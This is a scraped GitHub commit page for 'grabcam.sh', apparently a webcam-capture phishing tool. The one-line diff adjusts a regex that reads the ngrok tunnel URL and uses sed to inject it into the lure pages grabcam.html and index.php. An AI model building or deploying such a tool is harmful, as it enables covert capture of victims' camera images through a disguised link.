We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent f2be2ae commit e4b1f9cCopy full SHA for e4b1f9c
grabcam.sh
@@ -136,7 +136,7 @@ printf '\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] Direct link:\e[0m\e[1;77m %s\n' $s
136
137
payload_ngrok() {
138
139
-link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
+link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9A-Za-z.-]*\.ngrok.io")
140
sed 's+forwarding_link+'$link'+g' grabcam.html > index2.html
141
sed 's+forwarding_link+'$link'+g' template.php > index.php
142
0 commit comments